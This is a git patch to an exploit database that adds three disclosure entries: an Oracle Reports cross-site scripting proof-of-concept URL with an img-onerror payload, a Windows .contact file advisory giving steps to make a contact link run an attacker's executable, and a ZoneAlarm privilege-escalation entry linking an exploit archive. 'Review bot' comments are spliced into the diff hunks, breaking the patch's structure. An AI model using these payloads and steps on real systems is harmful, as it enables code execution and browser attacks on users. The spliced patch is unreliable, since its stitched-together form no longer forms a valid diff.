From fade9b8cd40ecc573184f20864dcf1e986559f02 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 18 Jan 2019 05:01:43 +0000
Subject: [PATCH] DB: 2019-01-18

3 changes to exploits/shellcodes

Microsoft Windows CONTACT - Remote Code Execution
Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation
Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
---
 exploits/multiple/webapps/46187.txt | 11 +++++
 exploits/windows/local/46188.txt | 68 +++++++++++++++++++++++++++++
 exploits/windows/local/46189.txt | 17 ++++++++
 files_exploits.csv | 3 ++
 4 files changed, 99 insertions(+)
 create mode 100644 exploits/multiple/webapps/46187.txt
 create mode 100644 exploits/windows/local/46188.txt
 create mode 100644 exploits/windows/local/46189.txt
diff --git a/exploits/multiple/webapps/46187.txt b/exploits/multiple/webapps/46187.txt
new file mode 100644
index 000000000..bd5b1ea1e
--- /dev/null
+++ b/exploits/multiple/webapps/46187.txt
@@ -0,0 +1,11 @@
+# Exploit Title: [Cross-site Scripting (XSS)]
+# Date: [2019-01-15]
+# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
+# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
+# Version: [12.2.1.3] (REQUIRED)
+# Tested on: [Windows 10]
+# CVE : [CVE-2019-2413]
+
+POC:
+
+https:///reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
\ No newline at end of file
diff --git a/exploits/windows/local/46188.txt b/exploits/windows/local/46188.txt
new file mode 100644
index 000000000..6b35136df
--- /dev/null
+++ b/exploits/windows/local/46188.txt
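Review bot: The PoC line `https:///reports/rwservlet/showenv%22%3E...` has an empty authority, so the host placeholder was lost on the way into the database and the entry no longer says that the path is relative to an affected Reports server; it should be written with an explicit placeholder such as `https://<host>/reports/rwservlet/...`. The header also keeps the submission template's scaffolding (`# Exploit Title: [Cross-site Scripting (XSS)]`, `# Version: [12.2.1.3] (REQUIRED)`): the square brackets and `(REQUIRED)` should be dropped. The title inside the file never names the product, while the index row calls it `Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting`; the file's `# Exploit Title:` should carry the same product name so the advisory is self-describing without the CSV.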
@@ -0,0 +1,68 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft .CONTACT File
+
+A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
+This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
+
+
+[Vulnerability Type]
+Insufficient UI Warning Arbitrary Code Execution
+
+
+[Security Issue]
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an
+executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
+
+e.g.
+
+www.hyp3rlinx.altervista.com
+
+Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
+Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
+
+The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
+This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
+
+
+[Exploit/POC]
+Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name.
+Create a directory to house the executable file
+Modify the contact file website link like ---> http.\\www..com
+Contact website link now points at "dir .\ executable" ---> http.\\www..com
+Compress the files using archive utility and place in webserver for download.
+
+
+[POC Video URL]
+https://vimeo.com/311759191
+
+
+[Disclosure Timeline]
+Reported to ZDI 2018-11-30
+This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10.
+https://www.zerodayinitiative.com/advisories/ZDI-19-013/
+Public disclosure : January 16, 2019
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/46189.txt b/exploits/windows/local/46189.txt
new file mode 100644
index 000000000..37c16891b
--- /dev/null
+++ b/exploits/windows/local/46189.txt
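Review bot: The advisory's own classification disagrees with the index: `[Vulnerability Type] Insufficient UI Warning Arbitrary Code Execution` together with `User interaction is required` describes user-assisted code execution from a local file, while the CSV row titles the entry `Remote Code Execution` (the same wording the existing VCF row 46167 uses, so this may be a deliberate convention rather than an error). The two PoC lines `Modify the contact file website link like ---> http.\\www..com` and `Contact website link now points at "dir .\ executable" ---> http.\\www..com` appear to have lost bracketed placeholder tokens during import, leaving `www..com`, which reads as a typo rather than a template; the stripped fields should be re-marked with explicit placeholders or a note that they were elided. The `[Disclosure Timeline]` only cites ZDI-19-013 for the VCF variant; a sentence stating whether Microsoft responded on the .contact variant (or that no response was received) would help readers judge whether a fix exists. Minor wording: `if the the files are compressed` doubles "the", and `archive utilitys` should be `archive utilities`.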
@@ -0,0 +1,17 @@
+# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
+# Date: 1/16/19
+# Exploit Author: Chris Anastasio
+# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
+# Software Link: Vulnerable Versions included in repo
+# Version:
+ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
+Vsmon version: 15.3.58.17668
+Driver version: 15.1.29.17237
+Antivirus engine version: 8.8.1.110
+Antivirus signature DAT file version: 1297458144
+# Tested on: Windows 7/Windows 10
+# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46189.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 31451b6c7..eff597b7c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
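Review bot: The entry contains no description of the flaw at all — which ZoneAlarm component is affected, the root cause, or the fixed build — only a version list and a link to an opaque external archive `46189.zip`, so a reader cannot assess exposure from the text and the only way to learn what the issue is would be to open the binary. A short summary plus the fixed version from the referenced vendor solution `sk142952` should be added, and the external archive should be pinned with a checksum line such as `# SHA-256 (46189.zip): <checksum placeholder>` so later tampering with the bin-sploits file is detectable. `# Date: 1/16/19` uses an ambiguous numeric format where the other new entries and the CSV use ISO dates; `# Date: 2019-01-16` would be consistent.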
@@ -10225,6 +10225,8 @@ id,file,description,date,author,type,platform,port
 46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows,
 46185,exploits/windows/local/46185.txt,"Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation",2019-01-16,"Google Security Research",local,windows,
 46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
+46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
+46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40664,3 +40666,4 @@ id,file,description,date,author,type,platform,port
 46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80
 46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80
 46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80
+46187,exploits/multiple/webapps/46187.txt,"Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting",2019-01-17,"Mohamed M.Fouad",webapps,multiple,443
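Review bot: The new row `46189,...,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation"` keys the title on the antivirus engine version, whereas the advisory lists the product itself as `ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729` and gives `8.8.1.110` only as the engine build; descriptions in this file carry the product version, so `"Check Point ZoneAlarm 15.3.064.17729 - Local Privilege Escalation"` would match the convention and make the affected build searchable (the engine version could stay in parentheses if it is what the fix keys on). The `46188` row's `Remote Code Execution` wording with type `local` mirrors the existing `46167` VCF row, so that combination looks intentional, though neither advisory describes a remote vector without user interaction. In the second hunk, `46187` gets port `443` while the advisory file states no port, presumably inferred from the `https://` PoC; the other two new rows leave the port empty, which matches their files.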